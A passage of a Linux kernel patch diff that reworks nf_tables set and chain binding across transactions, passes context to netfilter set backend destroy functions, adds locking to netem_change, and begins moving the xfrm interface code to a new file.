++	if (!list_empty(&set->bindings) &&
++	    (set->flags & (NFT_SET_CONSTANT | NFT_SET_ANONYMOUS)))
+ 		return -EBUSY;
+ 
+ 	nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);
+@@ -7464,6 +7657,7 @@ void nf_tables_deactivate_flowtable(const struct nft_ctx *ctx,
+ 				    enum nft_trans_phase phase)
+ {
+ 	switch (phase) {
++	case NFT_TRANS_PREPARE_ERROR:
+ 	case NFT_TRANS_PREPARE:
+ 	case NFT_TRANS_ABORT:
+ 	case NFT_TRANS_RELEASE:
+@@ -8658,7 +8852,7 @@ static void nf_tables_trans_destroy_work(struct work_struct *w)
+ 	synchronize_rcu();
+ 
+ 	list_for_each_entry_safe(trans, next, &head, list) {
+-		list_del(&trans->list);
++		nft_trans_list_del(trans);
+ 		nft_commit_release(trans);
+ 	}
+ }
+@@ -9025,6 +9219,27 @@ static int nf_tables_commit(struct net *net, struct sk_buff *skb)
+ 		return 0;
+ 	}
+ 
++	list_for_each_entry(trans, &nft_net->binding_list, binding_list) {
++		switch (trans->msg_type) {
++		case NFT_MSG_NEWSET:
++			if (!nft_trans_set_update(trans) &&
++			    nft_set_is_anonymous(nft_trans_set(trans)) &&
++			    !nft_trans_set_bound(trans)) {
++				pr_warn_once("nftables ruleset with unbound set\n");
++				return -EINVAL;
++			}
++			break;
++		case NFT_MSG_NEWCHAIN:
++			if (!nft_trans_chain_update(trans) &&
++			    nft_chain_binding(nft_trans_chain(trans)) &&
++			    !nft_trans_chain_bound(trans)) {
++				pr_warn_once("nftables ruleset with unbound chain\n");
++				return -EINVAL;
++			}
++			break;
++		}
++	}
++
+ 	/* 0. Validate ruleset, otherwise roll back for error reporting. */
+ 	if (nf_tables_validate(net) < 0)
+ 		return -EAGAIN;
+@@ -9368,7 +9583,7 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 				kfree(nft_trans_chain_name(trans));
+ 				nft_trans_destroy(trans);
+ 			} else {
+-				if (nft_chain_is_bound(trans->ctx.chain)) {
++				if (nft_trans_chain_bound(trans)) {
+ 					nft_trans_destroy(trans);
+ 					break;
+ 				}
+@@ -9385,6 +9600,10 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 			nft_trans_destroy(trans);
+ 			break;
+ 		case NFT_MSG_NEWRULE:
++			if (nft_trans_rule_bound(trans)) {
++				nft_trans_destroy(trans);
++				break;
++			}
+ 			trans->ctx.chain->use--;
+ 			list_del_rcu(&nft_trans_rule(trans)->list);
+ 			nft_rule_expr_deactivate(&trans->ctx,
+@@ -9417,6 +9636,9 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 		case NFT_MSG_DELSET:
+ 			trans->ctx.table->use++;
+ 			nft_clear(trans->ctx.net, nft_trans_set(trans));
++			if (nft_trans_set(trans)->flags & (NFT_SET_MAP | NFT_SET_OBJECT))
++				nft_map_activate(&trans->ctx, nft_trans_set(trans));
++
+ 			nft_trans_destroy(trans);
+ 			break;
+ 		case NFT_MSG_NEWSETELEM:
+@@ -9494,7 +9716,7 @@ static int __nf_tables_abort(struct net *net, enum nfnl_abort_action action)
+ 
+ 	list_for_each_entry_safe_reverse(trans, next,
+ 					 &nft_net->commit_list, list) {
+-		list_del(&trans->list);
++		nft_trans_list_del(trans);
+ 		nf_tables_abort_release(trans);
+ 	}
+ 
+@@ -9943,22 +10165,12 @@ static int nft_verdict_init(const struct nft_ctx *ctx, struct nft_data *data,
+ static void nft_verdict_uninit(const struct nft_data *data)
+ {
+ 	struct nft_chain *chain;
+-	struct nft_rule *rule;
+ 
+ 	switch (data->verdict.code) {
+ 	case NFT_JUMP:
+ 	case NFT_GOTO:
+ 		chain = data->verdict.chain;
+ 		chain->use--;
+-
+-		if (!nft_chain_is_bound(chain))
+-			break;
+-
+-		chain->table->use--;
+-		list_for_each_entry(rule, &chain->rules, list)
+-			chain->use--;
+-
+-		nft_chain_del(chain);
+ 		break;
+ 	}
+ }
+@@ -10193,6 +10405,9 @@ static void __nft_release_table(struct net *net, struct nft_table *table)
+ 	list_for_each_entry_safe(set, ns, &table->sets, list) {
+ 		list_del(&set->list);
+ 		table->use--;
++		if (set->flags & (NFT_SET_MAP | NFT_SET_OBJECT))
++			nft_map_deactivate(&ctx, set);
++
+ 		nft_set_destroy(&ctx, set);
+ 	}
+ 	list_for_each_entry_safe(obj, ne, &table->objects, list) {
+@@ -10277,6 +10492,7 @@ static int __net_init nf_tables_init_net(struct net *net)
+ 
+ 	INIT_LIST_HEAD(&nft_net->tables);
+ 	INIT_LIST_HEAD(&nft_net->commit_list);
++	INIT_LIST_HEAD(&nft_net->binding_list);
+ 	INIT_LIST_HEAD(&nft_net->module_list);
+ 	INIT_LIST_HEAD(&nft_net->notify_list);
+ 	mutex_init(&nft_net->commit_mutex);
+diff --git a/net/netfilter/nfnetlink_osf.c b/net/netfilter/nfnetlink_osf.c
+index ee6840bd59337..8f1bfa6ccc2d9 100644
+--- a/net/netfilter/nfnetlink_osf.c
++++ b/net/netfilter/nfnetlink_osf.c
+@@ -439,3 +439,4 @@ module_init(nfnl_osf_init);
+ module_exit(nfnl_osf_fini);
+ 
+ MODULE_LICENSE("GPL");
++MODULE_ALIAS_NFNL_SUBSYS(NFNL_SUBSYS_OSF);
+diff --git a/net/netfilter/nft_immediate.c b/net/netfilter/nft_immediate.c
+index 5f28b21abc7df..900e75e8c3465 100644
+--- a/net/netfilter/nft_immediate.c
++++ b/net/netfilter/nft_immediate.c
+@@ -76,11 +76,9 @@ static int nft_immediate_init(const struct nft_ctx *ctx,
+ 		switch (priv->data.verdict.code) {
+ 		case NFT_JUMP:
+ 		case NFT_GOTO:
+-			if (nft_chain_is_bound(chain)) {
+-				err = -EBUSY;
+-				goto err1;
+-			}
+-			chain->bound = true;
++			err = nf_tables_bind_chain(ctx, chain);
++			if (err < 0)
++				return err;
+ 			break;
+ 		default:
+ 			break;
+@@ -98,6 +96,31 @@ static void nft_immediate_activate(const struct nft_ctx *ctx,
+ 				   const struct nft_expr *expr)
+ {
+ 	const struct nft_immediate_expr *priv = nft_expr_priv(expr);
++	const struct nft_data *data = &priv->data;
++	struct nft_ctx chain_ctx;
++	struct nft_chain *chain;
++	struct nft_rule *rule;
++
++	if (priv->dreg == NFT_REG_VERDICT) {
++		switch (data->verdict.code) {
++		case NFT_JUMP:
++		case NFT_GOTO:
++			chain = data->verdict.chain;
++			if (!nft_chain_binding(chain))
++				break;
++
++			chain_ctx = *ctx;
++			chain_ctx.chain = chain;
++
++			list_for_each_entry(rule, &chain->rules, list)
++				nft_rule_expr_activate(&chain_ctx, rule);
++
++			nft_clear(ctx->net, chain);
++			break;
++		default:
++			break;
++		}
++	}
+ 
+ 	return nft_data_hold(&priv->data, nft_dreg_to_type(priv->dreg));
+ }
+@@ -107,6 +130,43 @@ static void nft_immediate_deactivate(const struct nft_ctx *ctx,
+ 				     enum nft_trans_phase phase)
+ {
+ 	const struct nft_immediate_expr *priv = nft_expr_priv(expr);
++	const struct nft_data *data = &priv->data;
++	struct nft_ctx chain_ctx;
++	struct nft_chain *chain;
++	struct nft_rule *rule;
++
++	if (priv->dreg == NFT_REG_VERDICT) {
++		switch (data->verdict.code) {
++		case NFT_JUMP:
++		case NFT_GOTO:
++			chain = data->verdict.chain;
++			if (!nft_chain_binding(chain))
++				break;
++
++			chain_ctx = *ctx;
++			chain_ctx.chain = chain;
++
++			list_for_each_entry(rule, &chain->rules, list)
++				nft_rule_expr_deactivate(&chain_ctx, rule, phase);
++
++			switch (phase) {
++			case NFT_TRANS_PREPARE_ERROR:
++				nf_tables_unbind_chain(ctx, chain);
++				fallthrough;
++			case NFT_TRANS_PREPARE:
++				nft_deactivate_next(ctx->net, chain);
++				break;
++			default:
++				nft_chain_del(chain);
++				chain->bound = false;
++				chain->table->use--;
++				break;
++			}
++			break;
++		default:
++			break;
++		}
++	}
+ 
+ 	if (phase == NFT_TRANS_COMMIT)
+ 		return;
+@@ -131,15 +191,27 @@ static void nft_immediate_destroy(const struct nft_ctx *ctx,
+ 	case NFT_GOTO:
+ 		chain = data->verdict.chain;
+ 
+-		if (!nft_chain_is_bound(chain))
++		if (!nft_chain_binding(chain))
++			break;
++
++		/* Rule construction failed, but chain is already bound:
++		 * let the transaction records release this chain and its rules.
++		 */
++		if (chain->bound) {
++			chain->use--;
+ 			break;
++		}
+ 
++		/* Rule has been deleted, release chain and its rules. */
+ 		chain_ctx = *ctx;
+ 		chain_ctx.chain = chain;
+ 
+-		list_for_each_entry_safe(rule, n, &chain->rules, list)
+-			nf_tables_rule_release(&chain_ctx, rule);
+-
++		chain->use--;
++		list_for_each_entry_safe(rule, n, &chain->rules, list) {
++			chain->use--;
++			list_del(&rule->list);
++			nf_tables_rule_destroy(&chain_ctx, rule);
++		}
+ 		nf_tables_chain_destroy(&chain_ctx);
+ 		break;
+ 	default:
+diff --git a/net/netfilter/nft_set_bitmap.c b/net/netfilter/nft_set_bitmap.c
+index 96081ac8d2b4c..1e5e7a181e0bc 100644
+--- a/net/netfilter/nft_set_bitmap.c
++++ b/net/netfilter/nft_set_bitmap.c
+@@ -271,13 +271,14 @@ static int nft_bitmap_init(const struct nft_set *set,
+ 	return 0;
+ }
+ 
+-static void nft_bitmap_destroy(const struct nft_set *set)
++static void nft_bitmap_destroy(const struct nft_ctx *ctx,
++			       const struct nft_set *set)
+ {
+ 	struct nft_bitmap *priv = nft_set_priv(set);
+ 	struct nft_bitmap_elem *be, *n;
+ 
+ 	list_for_each_entry_safe(be, n, &priv->list, head)
+-		nft_set_elem_destroy(set, be, true);
++		nf_tables_set_elem_destroy(ctx, set, be);
+ }
+ 
+ static bool nft_bitmap_estimate(const struct nft_set_desc *desc, u32 features,
+diff --git a/net/netfilter/nft_set_hash.c b/net/netfilter/nft_set_hash.c
+index 76de6c8d98655..0b73cb0e752f7 100644
+--- a/net/netfilter/nft_set_hash.c
++++ b/net/netfilter/nft_set_hash.c
+@@ -400,19 +400,31 @@ static int nft_rhash_init(const struct nft_set *set,
+ 	return 0;
+ }
+ 
++struct nft_rhash_ctx {
++	const struct nft_ctx	ctx;
++	const struct nft_set	*set;
++};
++
+ static void nft_rhash_elem_destroy(void *ptr, void *arg)
+ {
+-	nft_set_elem_destroy(arg, ptr, true);
++	struct nft_rhash_ctx *rhash_ctx = arg;
++
++	nf_tables_set_elem_destroy(&rhash_ctx->ctx, rhash_ctx->set, ptr);
+ }
+ 
+-static void nft_rhash_destroy(const struct nft_set *set)
++static void nft_rhash_destroy(const struct nft_ctx *ctx,
++			      const struct nft_set *set)
+ {
+ 	struct nft_rhash *priv = nft_set_priv(set);
++	struct nft_rhash_ctx rhash_ctx = {
++		.ctx	= *ctx,
++		.set	= set,
++	};
+ 
+ 	cancel_delayed_work_sync(&priv->gc_work);
+ 	rcu_barrier();
+ 	rhashtable_free_and_destroy(&priv->ht, nft_rhash_elem_destroy,
+-				    (void *)set);
++				    (void *)&rhash_ctx);
+ }
+ 
+ /* Number of buckets is stored in u32, so cap our result to 1U<<31 */
+@@ -643,7 +655,8 @@ static int nft_hash_init(const struct nft_set *set,
+ 	return 0;
+ }
+ 
+-static void nft_hash_destroy(const struct nft_set *set)
++static void nft_hash_destroy(const struct nft_ctx *ctx,
++			     const struct nft_set *set)
+ {
+ 	struct nft_hash *priv = nft_set_priv(set);
+ 	struct nft_hash_elem *he;
+@@ -653,7 +666,7 @@ static void nft_hash_destroy(const struct nft_set *set)
+ 	for (i = 0; i < priv->buckets; i++) {
+ 		hlist_for_each_entry_safe(he, next, &priv->table[i], node) {
+ 			hlist_del_rcu(&he->node);
+-			nft_set_elem_destroy(set, he, true);
++			nf_tables_set_elem_destroy(ctx, set, he);
+ 		}
+ 	}
+ }
+diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c
+index 15e451dc3fc46..0452ee586c1cc 100644
+--- a/net/netfilter/nft_set_pipapo.c
++++ b/net/netfilter/nft_set_pipapo.c
+@@ -1974,12 +1974,16 @@ static void nft_pipapo_walk(const struct nft_ctx *ctx, struct nft_set *set,
+ 			    struct nft_set_iter *iter)
+ {
+ 	struct nft_pipapo *priv = nft_set_priv(set);
++	struct net *net = read_pnet(&set->net);
+ 	struct nft_pipapo_match *m;
+ 	struct nft_pipapo_field *f;
+ 	int i, r;
+ 
+ 	rcu_read_lock();
+-	m = rcu_dereference(priv->match);
++	if (iter->genmask == nft_genmask_cur(net))
++		m = rcu_dereference(priv->match);
++	else
++		m = priv->clone;
+ 
+ 	if (unlikely(!m))
+ 		goto out;
+@@ -2148,10 +2152,12 @@ out_scratch:
+ 
+ /**
+  * nft_set_pipapo_match_destroy() - Destroy elements from key mapping array
++ * @ctx:	context
+  * @set:	nftables API set representation
+  * @m:		matching data pointing to key mapping array
+  */
+-static void nft_set_pipapo_match_destroy(const struct nft_set *set,
++static void nft_set_pipapo_match_destroy(const struct nft_ctx *ctx,
++					 const struct nft_set *set,
+ 					 struct nft_pipapo_match *m)
+ {
+ 	struct nft_pipapo_field *f;
+@@ -2168,15 +2174,17 @@ static void nft_set_pipapo_match_destroy(const struct nft_set *set,
+ 
+ 		e = f->mt[r].e;
+ 
+-		nft_set_elem_destroy(set, e, true);
++		nf_tables_set_elem_destroy(ctx, set, e);
+ 	}
+ }
+ 
+ /**
+  * nft_pipapo_destroy() - Free private data for set and all committed elements
++ * @ctx:	context
+  * @set:	nftables API set representation
+  */
+-static void nft_pipapo_destroy(const struct nft_set *set)
++static void nft_pipapo_destroy(const struct nft_ctx *ctx,
++			       const struct nft_set *set)
+ {
+ 	struct nft_pipapo *priv = nft_set_priv(set);
+ 	struct nft_pipapo_match *m;
+@@ -2186,7 +2194,7 @@ static void nft_pipapo_destroy(const struct nft_set *set)
+ 	if (m) {
+ 		rcu_barrier();
+ 
+-		nft_set_pipapo_match_destroy(set, m);
++		nft_set_pipapo_match_destroy(ctx, set, m);
+ 
+ #ifdef NFT_PIPAPO_ALIGN
+ 		free_percpu(m->scratch_aligned);
+@@ -2203,7 +2211,7 @@ static void nft_pipapo_destroy(const struct nft_set *set)
+ 		m = priv->clone;
+ 
+ 		if (priv->dirty)
+-			nft_set_pipapo_match_destroy(set, m);
++			nft_set_pipapo_match_destroy(ctx, set, m);
+ 
+ #ifdef NFT_PIPAPO_ALIGN
+ 		free_percpu(priv->clone->scratch_aligned);
+diff --git a/net/netfilter/nft_set_rbtree.c b/net/netfilter/nft_set_rbtree.c
+index 2f114aa10f1a7..5c05c9b990fba 100644
+--- a/net/netfilter/nft_set_rbtree.c
++++ b/net/netfilter/nft_set_rbtree.c
+@@ -664,7 +664,8 @@ static int nft_rbtree_init(const struct nft_set *set,
+ 	return 0;
+ }
+ 
+-static void nft_rbtree_destroy(const struct nft_set *set)
++static void nft_rbtree_destroy(const struct nft_ctx *ctx,
++			       const struct nft_set *set)
+ {
+ 	struct nft_rbtree *priv = nft_set_priv(set);
+ 	struct nft_rbtree_elem *rbe;
+@@ -675,7 +676,7 @@ static void nft_rbtree_destroy(const struct nft_set *set)
+ 	while ((node = priv->root.rb_node) != NULL) {
+ 		rb_erase(node, &priv->root);
+ 		rbe = rb_entry(node, struct nft_rbtree_elem, node);
+-		nft_set_elem_destroy(set, rbe, true);
++		nf_tables_set_elem_destroy(ctx, set, rbe);
+ 	}
+ }
+ 
+diff --git a/net/netfilter/xt_osf.c b/net/netfilter/xt_osf.c
+index e1990baf3a3b7..dc9485854002a 100644
+--- a/net/netfilter/xt_osf.c
++++ b/net/netfilter/xt_osf.c
+@@ -71,4 +71,3 @@ MODULE_AUTHOR("Evgeniy Polyakov <zbr@ioremap.net>");
+ MODULE_DESCRIPTION("Passive OS fingerprint matching.");
+ MODULE_ALIAS("ipt_osf");
+ MODULE_ALIAS("ip6t_osf");
+-MODULE_ALIAS_NFNL_SUBSYS(NFNL_SUBSYS_OSF);
+diff --git a/net/sched/sch_netem.c b/net/sched/sch_netem.c
+index fb00ac40ecb72..aa9842158df0a 100644
+--- a/net/sched/sch_netem.c
++++ b/net/sched/sch_netem.c
+@@ -966,6 +966,7 @@ static int netem_change(struct Qdisc *sch, struct nlattr *opt,
+ 	if (ret < 0)
+ 		return ret;
+ 
++	sch_tree_lock(sch);
+ 	/* backup q->clg and q->loss_model */
+ 	old_clg = q->clg;
+ 	old_loss_model = q->loss_model;
+@@ -974,7 +975,7 @@ static int netem_change(struct Qdisc *sch, struct nlattr *opt,
+ 		ret = get_loss_clg(q, tb[TCA_NETEM_LOSS]);
+ 		if (ret) {
+ 			q->loss_model = old_loss_model;
+-			return ret;
++			goto unlock;
+ 		}
+ 	} else {
+ 		q->loss_model = CLG_RANDOM;
+@@ -1041,6 +1042,8 @@ static int netem_change(struct Qdisc *sch, struct nlattr *opt,
+ 	/* capping jitter to the range acceptable by tabledist() */
+ 	q->jitter = min_t(s64, abs(q->jitter), INT_MAX);
+ 
++unlock:
++	sch_tree_unlock(sch);
+ 	return ret;
+ 
+ get_table_failure:
+@@ -1050,7 +1053,8 @@ get_table_failure:
+ 	 */
+ 	q->clg = old_clg;
+ 	q->loss_model = old_loss_model;
+-	return ret;
++
++	goto unlock;
+ }
+ 
+ static int netem_init(struct Qdisc *sch, struct nlattr *opt,
+diff --git a/net/xfrm/Makefile b/net/xfrm/Makefile
+index 494aa744bfb9a..08a2870fdd36f 100644
+--- a/net/xfrm/Makefile
++++ b/net/xfrm/Makefile
+@@ -3,6 +3,8 @@
+ # Makefile for the XFRM subsystem.
+ #
+ 
++xfrm_interface-$(CONFIG_XFRM_INTERFACE) += xfrm_interface_core.o
++
+ obj-$(CONFIG_XFRM) := xfrm_policy.o xfrm_state.o xfrm_hash.o \
+ 		      xfrm_input.o xfrm_output.o \
+ 		      xfrm_sysctl.o xfrm_replay.o xfrm_device.o
+diff --git a/net/xfrm/xfrm_input.c b/net/xfrm/xfrm_input.c
+index 2defd89da700d..ac1a645afa8df 100644
+--- a/net/xfrm/xfrm_input.c
++++ b/net/xfrm/xfrm_input.c
+@@ -131,6 +131,7 @@ struct sec_path *secpath_set(struct sk_buff *skb)
+ 	memset(sp->ovec, 0, sizeof(sp->ovec));
+ 	sp->olen = 0;
+ 	sp->len = 0;
++	sp->verified_cnt = 0;
+ 
+ 	return sp;
+ }
+diff --git a/net/xfrm/xfrm_interface.c b/net/xfrm/xfrm_interface.c
+deleted file mode 100644
+index 5a67b120c4dbd..0000000000000
+--- a/net/xfrm/xfrm_interface.c
++++ /dev/null
+@@ -1,1198 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0
+-/*
+- *	XFRM virtual interface
+- *
+- *	Copyright (C) 2018 secunet Security Networks AG
+- *
+- *	Author:
+- *	Steffen Klassert <steffen.klassert@secunet.com>
+- */
+-
+-#include <linux/module.h>
+-#include <linux/capability.h>
+-#include <linux/errno.h>
+-#include <linux/types.h>
+-#include <linux/sockios.h>
+-#include <linux/icmp.h>
+-#include <linux/if.h>
+-#include <linux/in.h>
+-#include <linux/ip.h>
+-#include <linux/net.h>
+-#include <linux/in6.h>
+-#include <linux/netdevice.h>
+-#include <linux/if_link.h>
+-#include <linux/if_arp.h>
+-#include <linux/icmpv6.h>
+-#include <linux/init.h>
+-#include <linux/route.h>
+-#include <linux/rtnetlink.h>
+-#include <linux/netfilter_ipv6.h>
+-#include <linux/slab.h>
+-#include <linux/hash.h>
+-
+-#include <linux/uaccess.h>
+-#include <linux/atomic.h>
+-
+-#include <net/icmp.h>
+-#include <net/ip.h>
+-#include <net/ipv6.h>
+-#include <net/ip6_route.h>
+-#include <net/ip_tunnels.h>
+-#include <net/addrconf.h>
+-#include <net/xfrm.h>
+-#include <net/net_namespace.h>
+-#include <net/dst_metadata.h>
+-#include <net/netns/generic.h>
+-#include <linux/etherdevice.h>
+-
+-static int xfrmi_dev_init(struct net_device *dev);
+-static void xfrmi_dev_setup(struct net_device *dev);
+-static struct rtnl_link_ops xfrmi_link_ops __read_mostly;
+-static unsigned int xfrmi_net_id __read_mostly;
+-static const struct net_device_ops xfrmi_netdev_ops;
+-
+-#define XFRMI_HASH_BITS	8
+-#define XFRMI_HASH_SIZE	BIT(XFRMI_HASH_BITS)
+-
+-struct xfrmi_net {
+-	/* lists for storing interfaces in use */
+-	struct xfrm_if __rcu *xfrmi[XFRMI_HASH_SIZE];
+-	struct xfrm_if __rcu *collect_md_xfrmi;
+-};
+-
+-static const struct nla_policy xfrm_lwt_policy[LWT_XFRM_MAX + 1] = {
+-	[LWT_XFRM_IF_ID]	= NLA_POLICY_MIN(NLA_U32, 1),
+-	[LWT_XFRM_LINK]		= NLA_POLICY_MIN(NLA_U32, 1),
+-};
+-
+-static void xfrmi_destroy_state(struct lwtunnel_state *lwt)
+-{
+-}
+-
+-static int xfrmi_build_state(struct net *net, struct nlattr *nla,
+-			     unsigned int family, const void *cfg,
+-			     struct lwtunnel_state **ts,
+-			     struct netlink_ext_ack *extack)
+-{
+-	struct nlattr *tb[LWT_XFRM_MAX + 1];
+-	struct lwtunnel_state *new_state;
+-	struct xfrm_md_info *info;
+-	int ret;
+-
+-	ret = nla_parse_nested(tb, LWT_XFRM_MAX, nla, xfrm_lwt_policy, extack);
+-	if (ret < 0)
+-		return ret;
+-
+-	if (!tb[LWT_XFRM_IF_ID]) {
+-		NL_SET_ERR_MSG(extack, "if_id must be set");
+-		return -EINVAL;
+-	}
+-
+-	new_state = lwtunnel_state_alloc(sizeof(*info));
+-	if (!new_state) {
+-		NL_SET_ERR_MSG(extack, "failed to create encap info");
+-		return -ENOMEM;
+-	}
+-
+-	new_state->type = LWTUNNEL_ENCAP_XFRM;
+-
+-	info = lwt_xfrm_info(new_state);
+-
+-	info->if_id = nla_get_u32(tb[LWT_XFRM_IF_ID]);
+-
+-	if (tb[LWT_XFRM_LINK])
+-		info->link = nla_get_u32(tb[LWT_XFRM_LINK]);
+-
+-	*ts = new_state;
+-	return 0;
+-}
+-
+-static int xfrmi_fill_encap_info(struct sk_buff *skb,
+-				 struct lwtunnel_state *lwt)
+-{
+-	struct xfrm_md_info *info = lwt_xfrm_info(lwt);
+-
+-	if (nla_put_u32(skb, LWT_XFRM_IF_ID, info->if_id) ||
+-	    (info->link && nla_put_u32(skb, LWT_XFRM_LINK, info->link)))
+-		return -EMSGSIZE;
+-
+-	return 0;
+-}
+-
+-static int xfrmi_encap_nlsize(struct lwtunnel_state *lwtstate)
+-{
+-	return nla_total_size(sizeof(u32)) + /* LWT_XFRM_IF_ID */
+-		nla_total_size(sizeof(u32)); /* LWT_XFRM_LINK */
+-}
+-
+-static int xfrmi_encap_cmp(struct lwtunnel_state *a, struct lwtunnel_state *b)
+-{
+-	struct xfrm_md_info *a_info = lwt_xfrm_info(a);
+-	struct xfrm_md_info *b_info = lwt_xfrm_info(b);
+-
+-	return memcmp(a_info, b_info, sizeof(*a_info));
+-}
+-
+-static const struct lwtunnel_encap_ops xfrmi_encap_ops = {
+-	.build_state	= xfrmi_build_state,
+-	.destroy_state	= xfrmi_destroy_state,
+-	.fill_encap	= xfrmi_fill_encap_info,
+-	.get_encap_size = xfrmi_encap_nlsize,
+-	.cmp_encap	= xfrmi_encap_cmp,
+-	.owner		= THIS_MODULE,
+-};
+-
+-#define for_each_xfrmi_rcu(start, xi) \
+-	for (xi = rcu_dereference(start); xi; xi = rcu_dereference(xi->next))
+-
+-static u32 xfrmi_hash(u32 if_id)
+-{
+-	return hash_32(if_id, XFRMI_HASH_BITS);
+-}
+-
+-static struct xfrm_if *xfrmi_lookup(struct net *net, struct xfrm_state *x)
+-{
+-	struct xfrmi_net *xfrmn = net_generic(net, xfrmi_net_id);
+-	struct xfrm_if *xi;
+-
+-	for_each_xfrmi_rcu(xfrmn->xfrmi[xfrmi_hash(x->if_id)], xi) {
+-		if (x->if_id == xi->p.if_id &&
+-		    (xi->dev->flags & IFF_UP))
+-			return xi;
+-	}
+-
+-	xi = rcu_dereference(xfrmn->collect_md_xfrmi);
+-	if (xi && (xi->dev->flags & IFF_UP))
+-		return xi;
+-
+-	return NULL;
+-}
+-
+-static bool xfrmi_decode_session(struct sk_buff *skb,
+-				 unsigned short family,
+-				 struct xfrm_if_decode_session_result *res)
+-{
+-	struct net_device *dev;
+-	struct xfrm_if *xi;
+-	int ifindex = 0;
+-
+-	if (!secpath_exists(skb) || !skb->dev)
+-		return false;
+-
+-	switch (family) {
+-	case AF_INET6:
+-		ifindex = inet6_sdif(skb);
+-		break;
+-	case AF_INET:
+-		ifindex = inet_sdif(skb);
+-		break;
+-	}
+-
+-	if (ifindex) {
+-		struct net *net = xs_net(xfrm_input_state(skb));
+-
+-		dev = dev_get_by_index_rcu(net, ifindex);
+-	} else {
+-		dev = skb->dev;
+-	}
+-
+-	if (!dev || !(dev->flags & IFF_UP))
+-		return false;
+-	if (dev->netdev_ops != &xfrmi_netdev_ops)
+-		return false;
+-
+-	xi = netdev_priv(dev);
+-	res->net = xi->net;
+-
+-	if (xi->p.collect_md)
+-		res->if_id = xfrm_input_state(skb)->if_id;
+-	else
+-		res->if_id = xi->p.if_id;
+-	return true;
+-}
+-
+-static void xfrmi_link(struct xfrmi_net *xfrmn, struct xfrm_if *xi)
+-{
+-	struct xfrm_if __rcu **xip = &xfrmn->xfrmi[xfrmi_hash(xi->p.if_id)];
+-
+-	rcu_assign_pointer(xi->next , rtnl_dereference(*xip));
+-	rcu_assign_pointer(*xip, xi);
+-}
+-
+-static void xfrmi_unlink(struct xfrmi_net *xfrmn, struct xfrm_if *xi)
+-{
+-	struct xfrm_if __rcu **xip;
+-	struct xfrm_if *iter;
+-
+-	for (xip = &xfrmn->xfrmi[xfrmi_hash(xi->p.if_id)];
+-	     (iter = rtnl_dereference(*xip)) != NULL;
+-	     xip = &iter->next) {
+-		if (xi == iter) {
+-			rcu_assign_pointer(*xip, xi->next);
+-			break;
+-		}
+-	}
+-}
+-
+-static void xfrmi_dev_free(struct net_device *dev)
+-{
+-	struct xfrm_if *xi = netdev_priv(dev);
+-
+-	gro_cells_destroy(&xi->gro_cells);
+-	free_percpu(dev->tstats);
+-}
+-
+-static int xfrmi_create(struct net_device *dev)
+-{
+-	struct xfrm_if *xi = netdev_priv(dev);
+-	struct net *net = dev_net(dev);
+-	struct xfrmi_net *xfrmn = net_generic(net, xfrmi_net_id);
+-	int err;
+-
+-	dev->rtnl_link_ops = &xfrmi_link_ops;
+-	err = register_netdevice(dev);
+-	if (err < 0)
+-		goto out;
+-
+-	if (xi->p.collect_md)
+-		rcu_assign_pointer(xfrmn->collect_md_xfrmi, xi);
+-	else
+-		xfrmi_link(xfrmn, xi);
+-
+-	return 0;
+-
+-out:
+-	return err;
+-}
+-
+-static struct xfrm_if *xfrmi_locate(struct net *net, struct xfrm_if_parms *p)
+-{
+-	struct xfrm_if __rcu **xip;
+-	struct xfrm_if *xi;
+-	struct xfrmi_net *xfrmn = net_generic(net, xfrmi_net_id);
+-
+-	for (xip = &xfrmn->xfrmi[xfrmi_hash(p->if_id)];
+-	     (xi = rtnl_dereference(*xip)) != NULL;
+-	     xip = &xi->next)
+-		if (xi->p.if_id == p->if_id)
+-			return xi;
+-
+-	return NULL;
+-}
+-
+-static void xfrmi_dev_uninit(struct net_device *dev)
+-{
+-	struct xfrm_if *xi = netdev_priv(dev);
+-	struct xfrmi_net *xfrmn = net_generic(xi->net, xfrmi_net_id);
+-
+-	if (xi->p.collect_md)
+-		RCU_INIT_POINTER(xfrmn->collect_md_xfrmi, NULL);
+-	else
+-		xfrmi_unlink(xfrmn, xi);
+-}
+-
+-static void xfrmi_scrub_packet(struct sk_buff *skb, bool xnet)
+-{
+-	skb_clear_tstamp(skb);
+-	skb->pkt_type = PACKET_HOST;
+-	skb->skb_iif = 0;
+-	skb->ignore_df = 0;
+-	skb_dst_drop(skb);
+-	nf_reset_ct(skb);
+-	nf_reset_trace(skb);
+-
+-	if (!xnet)
+-		return;
+-
+-	ipvs_reset(skb);
+-	secpath_reset(skb);
+-	skb_orphan(skb);
+-	skb->mark = 0;
+-}
+-
+-static int xfrmi_rcv_cb(struct sk_buff *skb, int err)
+-{
+-	const struct xfrm_mode *inner_mode;
+-	struct net_device *dev;
+-	struct xfrm_state *x;
+-	struct xfrm_if *xi;
+-	bool xnet;
+-	int link;
+-
+-	if (err && !secpath_exists(skb))
+-		return 0;
+-
+-	x = xfrm_input_state(skb);
+-
+-	xi = xfrmi_lookup(xs_net(x), x);
+-	if (!xi)
+-		return 1;
+-
+-	link = skb->dev->ifindex;
+-	dev = xi->dev;
+-	skb->dev = dev;
+-
+-	if (err) {
+-		dev->stats.rx_errors++;
+-		dev->stats.rx_dropped++;
+-
+-		return 0;
+-	}
+-
+-	xnet = !net_eq(xi->net, dev_net(skb->dev));
+-
+-	if (xnet) {
+-		inner_mode = &x->inner_mode;
+-
+-		if (x->sel.family == AF_UNSPEC) {
+-			inner_mode = xfrm_ip2inner_mode(x, XFRM_MODE_SKB_CB(skb)->protocol);
+-			if (inner_mode == NULL) {
+-				XFRM_INC_STATS(dev_net(skb->dev),
+-					       LINUX_MIB_XFRMINSTATEMODEERROR);
+-				return -EINVAL;
+-			}
+-		}
+-
+-		if (!xfrm_policy_check(NULL, XFRM_POLICY_IN, skb,
+-				       inner_mode->family))
+-			return -EPERM;
+-	}
+-
+-	xfrmi_scrub_packet(skb, xnet);
+-	if (xi->p.collect_md) {
+-		struct metadata_dst *md_dst;
+-
+-		md_dst = metadata_dst_alloc(0, METADATA_XFRM, GFP_ATOMIC);
+-		if (!md_dst)
+-			return -ENOMEM;
+-
+-		md_dst->u.xfrm_info.if_id = x->if_id;
+-		md_dst->u.xfrm_info.link = link;
+-		skb_dst_set(skb, (struct dst_entry *)md_dst);
